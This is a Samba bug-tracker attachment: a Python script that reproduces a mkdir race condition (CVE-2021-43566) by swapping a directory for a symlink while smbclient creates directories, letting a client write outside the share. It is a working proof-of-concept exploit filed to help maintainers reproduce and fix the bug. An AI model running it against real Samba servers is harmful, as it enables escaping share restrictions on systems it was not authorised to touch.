The Samba-Bugzilla – Attachment 15213 Details for
Bug 13979
CVE-2021-43566 [SECURITY] mkdir race condition allows share escape in Samba 4.x
Race reproduction script from June 2, 2019
race-2019-06-02.py (text/plain), 1.18 KB, created by
hansmi
on 2019-06-02 19:42:01 UTC
#!/usr/bin/python3

import os
import sys
import shutil
import time
import random
import threading
import subprocess


ev = threading.Event()


def worker():
  path = "/mnt/first"
  dest = os.path.join(path, "dest")
  fordel = os.path.join(path, "fordel")

  while True:
    try:
      if os.path.islink(dest):
        os.unlink(dest)
      elif os.path.isdir(dest):
        shutil.rmtree(dest)

      if os.path.isdir(fordel):
        shutil.rmtree(fordel)

      os.mkdir(dest)
      ev.set()
      os.rename(dest, fordel)
      os.symlink("/tmp", dest)
      ev.clear()
    except Exception as err:
      print(err)


def main():
  threading.Thread(target=worker, daemon=True).start()

  # Use smbclient to force use of separate smbd process as well as to require
  # resolving of symlink on server
  cmd = [
    "bin/smbclient",
    "-U", "johndoe",
    r"\\172.17.0.2\data",
    "pass",
    "-",
  ]

  with subprocess.Popen(cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
    while True:
      ev.wait()
      proc.stdin.write("mkdir dest/shouldnotexist.{}\n".format(time.time()))
      proc.stdin.flush()


if __name__ == "__main__":
  main()

# vim: set sw=2 sts=2 et :